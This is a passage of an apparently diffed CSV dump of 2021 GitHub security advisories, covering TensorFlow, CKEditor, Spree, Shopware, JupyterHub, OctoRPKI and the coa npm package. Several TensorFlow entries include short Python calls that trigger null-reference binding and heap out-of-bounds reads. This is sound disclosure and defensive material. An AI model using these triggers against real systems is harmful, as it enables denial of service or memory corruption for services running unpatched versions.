+During TensorFlow's Grappler optimizer phase, constant folding might attempt to deep copy a resource tensor. This results in a segfault, as these tensors are supposed to not change.
+
+### Patches
+We have patched the issue in GitHub commit [7731e8dfbe4a56773be5dc94d631611211156659](https://github.com/tensorflow/tensorflow/commit/7731e8dfbe4a56773be5dc94d631611211156659).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-786j-5qwq-r36x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41204'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/7731e8dfbe4a56773be5dc94d631611211156659'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-824'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:45:03Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}"
+1.4.0,GHSA-4f99-p9c2-3j8x,2021-11-08T22:08:27Z,2021-11-10T18:51:51Z,,['CVE-2021-41219'],Undefined behavior via `nullptr` reference binding in sparse matrix multiplication,"### Impact
+The [code for sparse matrix multiplication](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/sparse_matmul_op.cc#L954-L1086) is vulnerable to undefined behavior via binding a reference to `nullptr`:
+
+```python
+import tensorflow as tf
+
+tf.raw_ops.SparseMatMul(
+ a=[[1.0,1.0,1.0]],
+ b=[[],[],[]],
+ transpose_a=False,
+ transpose_b=False,
+ a_is_sparse=False,
+ b_is_sparse=True)
+```
+
+This occurs whenever the dimensions of `a` or `b` are 0 or less. In the case on one of these is 0, an empty output tensor should be allocated (to conserve the invariant that output tensors are always allocated when the operation is successful) but nothing should be written to it (that is, we should return early from the kernel implementation). Otherwise, attempts to write to this empty tensor would result in heap OOB access.
+
+### Patches
+We have patched the issue in GitHub commit [e6cf28c72ba2eb949ca950d834dd6d66bb01cfae](https://github.com/tensorflow/tensorflow/commit/e6cf28c72ba2eb949ca950d834dd6d66bb01cfae).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4f99-p9c2-3j8x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41219'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/e6cf28c72ba2eb949ca950d834dd6d66bb01cfae'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125', 'CWE-824'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:08:27Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}"
+1.4.0,GHSA-mc8v-mgrf-8f4m,2021-12-13T13:12:02Z,2021-11-18T16:13:08Z,,['CVE-2021-41190'],Clarify Content-Type handling,"### Impact
+In the OCI Distribution Specification version 1.0.0 and prior, the Content-Type header alone was used to determine the type of document during push and pull operations. Documents that contain both “manifests” and “layers” fields could be interpreted as either a manifest or an index in the absence of an accompanying Content-Type header. If a Content-Type header changed between two pulls of the same digest, a client may interpret the resulting content differently.
+
+### Patches
+The OCI Distribution Specification will be updated to require that a `mediaType` value present in a manifest or index match the Content-Type header used during the push and pull operations.
+
+### Workarounds
+Clients pulling from a registry may distrust the Content-Type header and reject an ambiguous document that contains both “manifests” and “layers” fields or “manifests” and “config” fields.
+
+### References
+https://github.com/opencontainers/image-spec/security/advisories/GHSA-77vh-xpmg-72qh
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in https://github.com/opencontainers/distribution-spec/
+* Email us at security@opencontainers.org
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/opencontainers/distribution-spec'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/opencontainers/distribution-spec/security/advisories/GHSA-mc8v-mgrf-8f4m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41190'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/distribution-spec/commit/ac28cac0557bcd3084714ab09f9f2356fe504923'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencontainers/distribution-spec'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3TUZNDAH2B26VPBK342UC3BHZNLBUXGX/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4334HT7AZPLWNYHW4ARU6JBUF3VZJPZN/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/A2RRFNTMFYKOTRKD37F5ANMCIO3GGJML/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DX63GRWFEI5RVMYV6XLMCG4OHPWZML27/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RZTO6N55WHKHIZI4IMLY2QFBPMVTAERM/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SQBCYJUIM5GVCMFUPRWKRZNXMMI5EFA4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T4OJ764CKKCWCVONHD4YXTGR7HZ7LRUV/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YIGVQWOA5XXCQXEOOKZX4CDAGLBDRPRX/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/19/10'}]","{'cwe_ids': ['CWE-843'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T23:13:37Z', 'nvd_published_at': '2021-11-17T20:15:00Z'}"
+1.4.0,GHSA-cw7p-q79f-m2v7,2021-11-04T17:49:19Z,2021-11-08T18:02:37Z,,['CVE-2021-41247'],incomplete JupyterHub logout with simultaneous JupyterLab sessions,"### Impact
+
+Users of JupyterLab with JupyterHub who have multiple JupyterLab tabs open in the same browser session, may see incomplete logout from the single-user server, as fresh credentials (for the single-user server only, not the Hub) reinstated after logout, if another active JupyterLab session is open while the logout takes place.
+
+### Patches
+
+Upgrade to JupyterHub 1.5. For distributed deployments, it is jupyterhub in the _user_ environment that needs patching. There are no patches necessary in the Hub environment.
+
+### Workarounds
+
+The only workaround is to make sure that only one JupyterLab tab is open when you log out.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'jupyterhub'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jupyterhub/jupyterhub/security/advisories/GHSA-cw7p-q79f-m2v7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41247'}, {'type': 'WEB', 'url': 'https://github.com/jupyterhub/jupyterhub/commit/5ac9e7f73a6e1020ffddc40321fc53336829fe27'}, {'type': 'PACKAGE', 'url': 'https://github.com/jupyterhub/jupyterhub'}]","{'cwe_ids': ['CWE-613'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T17:49:19Z', 'nvd_published_at': '2021-11-04T18:15:00Z'}"
+1.4.0,GHSA-5mxh-2qfv-4g7j,2022-04-05T19:29:23Z,2021-11-10T20:15:06Z,,['CVE-2021-3910'],NUL character in ROA causes OctoRPKI to crash,"OctoRPKI crashes when encountering a repository that returns an invalid ROA (just an encoded `NUL` (`\0`) character).
+
+## Patches
+
+## For more information
+If you have any questions or comments about this advisory email us at security@cloudflare.com","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/cloudflare/cfrpki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-5mxh-2qfv-4g7j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3910'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/commit/76f0f7a98da001fa04e5bc0407c6702f91096bfa'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/cfrpki'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/releases/tag/v1.4.0'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0251'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5041'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:17:39Z', 'nvd_published_at': '2021-11-11T22:15:00Z'}"
+1.4.0,GHSA-pvmx-g8h5-cprj,2022-02-08T20:39:22Z,2021-11-17T21:55:10Z,,['CVE-2021-41164'],Advanced Content Filter (ACF) vulnerability allowing to execute JavaScript code using malformed HTML,"### Affected packages
+The vulnerability has been discovered in the Advanced Content Filter (ACF) module and may affect all plugins used by CKEditor 4.
+
+### Impact
+A potential vulnerability has been discovered in CKEditor 4 Advanced Content Filter (ACF) core module. The vulnerability allowed to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code. It affects all users using the CKEditor 4 at version < 4.17.0.
+
+### Patches
+The problem has been recognized and patched. The fix will be available in version 4.17.0.
+
+### For more information
+Email us at security@cksource.com if you have any questions or comments about this advisory.
+
+### Acknowledgements
+The CKEditor 4 team would like to thank Maurice Dauer ([laytonctf](https://twitter.com/laytonctf)) for recognizing and reporting this vulnerability.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'ckeditor4'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.17.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-pvmx-g8h5-cprj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41164'}, {'type': 'PACKAGE', 'url': 'https://github.com/ckeditor/ckeditor4'}, {'type': 'WEB', 'url': 'https://github.com/ckeditor/ckeditor4/blob/major/CHANGES.md#ckeditor-417'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VR76VBN5GW5QUBJFHVXRX36UZ6YTCMW6/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WOZGMCYDB2OKKULFXZKM6V7JJW4ZZHJP/'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2021-011'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T19:56:22Z', 'nvd_published_at': '2021-11-17T19:15:00Z'}"
+1.4.0,GHSA-gpqc-4pp7-5954,2023-05-26T15:06:11Z,2021-11-18T20:15:35Z,,[],Authentication Bypass by CSRF Weakness,"### Impact
+
+CSRF vulnerability that allows user account takeover.
+
+All applications using any version of the frontend component of `spree_auth_devise` are affected if `protect_from_forgery` method is both:
+
+* Executed whether as:
+ * A before_action callback (the default)
+ * A prepend_before_action (option prepend: true given) before the :load_object hook in Spree::UserController (most likely order to find).
+* Configured to use :null_session or :reset_session strategies (:null_session is the default in case the no strategy is given, but rails --new generated skeleton use :exception).
+
+That means that applications that haven't been configured differently from what it's generated with Rails aren't affected.
+
+Thanks @waiting-for-dev for reporting and providing a patch 👏
+
+### Patches
+
+Spree 4.3 users should update to spree_auth_devise 4.4.1
+Spree 4.2 users should update to spree_auth_devise 4.2.1
+Spree 4.1 users should update to spree_auth_devise 4.1.1
+Older Spree version users should update to spree_auth_devise 4.0.1
+
+### Workarounds
+
+If possible, change your strategy to :exception:
+
+```ruby
+class ApplicationController < ActionController::Base
+ protect_from_forgery with: :exception
+end
+```
+
+Add the following to`config/application.rb `to at least run the `:exception` strategy on the affected controller:
+
+```ruby
+config.after_initialize do
+ Spree::UsersController.protect_from_forgery with: :exception
+end
+```
+
+### References
+https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'spree_auth_devise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2'}, {'type': 'WEB', 'url': 'https://github.com/spree/spree_auth_devise/security/advisories/GHSA-gpqc-4pp7-5954'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth_devise/CVE-2021-41275.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/spree/spree_auth_devise'}]","{'cwe_ids': ['CWE-352'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T21:45:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-r64m-qchj-hrjp,2021-11-24T19:58:48Z,2021-11-24T20:05:19Z,,[],Webcache Poisoning in shopware/platform and shopware/core,"### Impact
+Webcache Poisoning via X-Forwarded-Prefix and sub-request
+
+### Patches
+We recommend updating to the current version 6.4.6.1. You can get the update to 6.4.6.1 regularly via the Auto-Updater or directly via the download overview.
+
+https://www.shopware.com/en/download/#shopware-6
+
+Workarounds
+For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.
+
+https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659
+",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.6.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.6.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.6.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.6.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-r64m-qchj-hrjp'}, {'type': 'WEB', 'url': 'https://github.com/shopware/platform/commit/9062f15450d183f2c666664841efd4f5ef25e0f3'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/platform'}]","{'cwe_ids': ['CWE-444'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-24T19:58:48Z', 'nvd_published_at': None}"
+1.4.0,GHSA-57wx-m983-2f88,2021-11-10T18:35:40Z,2021-11-10T19:37:56Z,,['CVE-2021-41208'],Incomplete validation in boosted trees code,"### Impact
+The [code for boosted trees in TensorFlow](https://github.com/tensorflow/tensorflow/blob/e0b6e58c328059829c3eb968136f17aa72b6c876/tensorflow/core/kernels/boosted_trees/stats_ops.cc) is still missing validation. As a result, attackers can trigger denial of service (via dereferencing `nullptr`s or via `CHECK`-failures) as well as abuse undefined behavior (binding references to `nullptr`s). An attacker can also read and write from heap buffers, depending on the API that gets used and the arguments that are passed to the call.
+
+**Note**: Given that the boosted trees implementation in TensorFlow is unmaintained, it is recommend to no longer use these APIs. Instead, please use the downstream [TensorFlow Decision Forests](https://github.com/tensorflow/decision-forests) project which is newer and supports more features. We will deprecate TensorFlow's boosted trees APIs in subsequent releases.
+
+### Patches
+We have patched the issue in GitHub commit [5c8c9a8bfe750f9743d0c859bae112060b216f5c](https://github.com/tensorflow/tensorflow/commit/5c8c9a8bfe750f9743d0c859bae112060b216f5c).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-57wx-m983-2f88'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41208'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/5c8c9a8bfe750f9743d0c859bae112060b216f5c'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-476', 'CWE-824'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:38:32Z', 'nvd_published_at': '2021-11-05T22:15:00Z'}"
+1.4.0,GHSA-m342-ff57-4jcc,2021-11-08T22:34:11Z,2021-11-10T19:01:44Z,,['CVE-2021-41210'],Heap OOB read in `tf.raw_ops.SparseCountSparseOutput`,"### Impact
+The [shape inference functions for `SparseCountSparseOutput`](https://github.com/tensorflow/tensorflow/blob/e0b6e58c328059829c3eb968136f17aa72b6c876/tensorflow/core/ops/count_ops.cc#L43-L50) can trigger a read outside of bounds of heap allocated array:
+
+```python
+import tensorflow as tf
+
+@tf.function
+def func():
+ return tf.raw_ops.SparseCountSparseOutput(
+ indices=[1],
+ values=[[1]],
+ dense_shape=[10],
+ weights=[],
+ binary_output= True)
+
+func()
+```
+
+The function fails to check that the first input (i.e., `indices`) has rank 2:
+
+```cc
+ auto rank = c->Dim(c->input(0), 1);
+```
+
+### Patches
+We have patched the issue in GitHub commit [701cfaca222a82afbeeb17496bd718baa65a67d2](https://github.com/tensorflow/tensorflow/commit/701cfaca222a82afbeeb17496bd718baa65a67d2).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-m342-ff57-4jcc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41210'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/701cfaca222a82afbeeb17496bd718baa65a67d2'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:34:11Z', 'nvd_published_at': '2021-11-05T20:15:00Z'}"
+1.4.0,GHSA-frcx-xc72-c4v4,2021-11-30T21:55:50Z,2021-11-29T18:09:08Z,2021-11-30T21:33:03Z,['CVE-2021-44150'],Use of Sha-1 in tusdotnet,"# Withdrawn
+
+After reviewing this CVE, we have withdrawn this advisory due to it not having actual security impact.
+
+# Original Advisory
+
+The client in tusdotnet through 2.5.0 relies on SHA-1 to prevent spoofing of file content.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'tusdotnet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-44150'}, {'type': 'WEB', 'url': 'https://github.com/github/advisory-database/issues/2324'}, {'type': 'WEB', 'url': 'https://github.com/tusdotnet/tusdotnet/issues/157'}, {'type': 'PACKAGE', 'url': 'https://github.com/tusdotnet/tusdotnet'}, {'type': 'WEB', 'url': 'https://shattered.io/'}]","{'cwe_ids': ['CWE-327'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-11-23T19:18:34Z', 'nvd_published_at': '2021-11-22T22:15:00Z'}"
+1.4.0,GHSA-73qr-pfmq-6rp8,2022-09-07T22:16:29Z,2021-11-04T16:22:28Z,,[],Embedded malware in coa,"The npm package `coa` had versions published with malicious code. Users of affected versions (2.0.3 and above) should downgrade to 2.0.2 as soon as possible and check their systems for suspicious activity. See [this issue](https://github.com/veged/coa/issues/99) for details as they unfold.
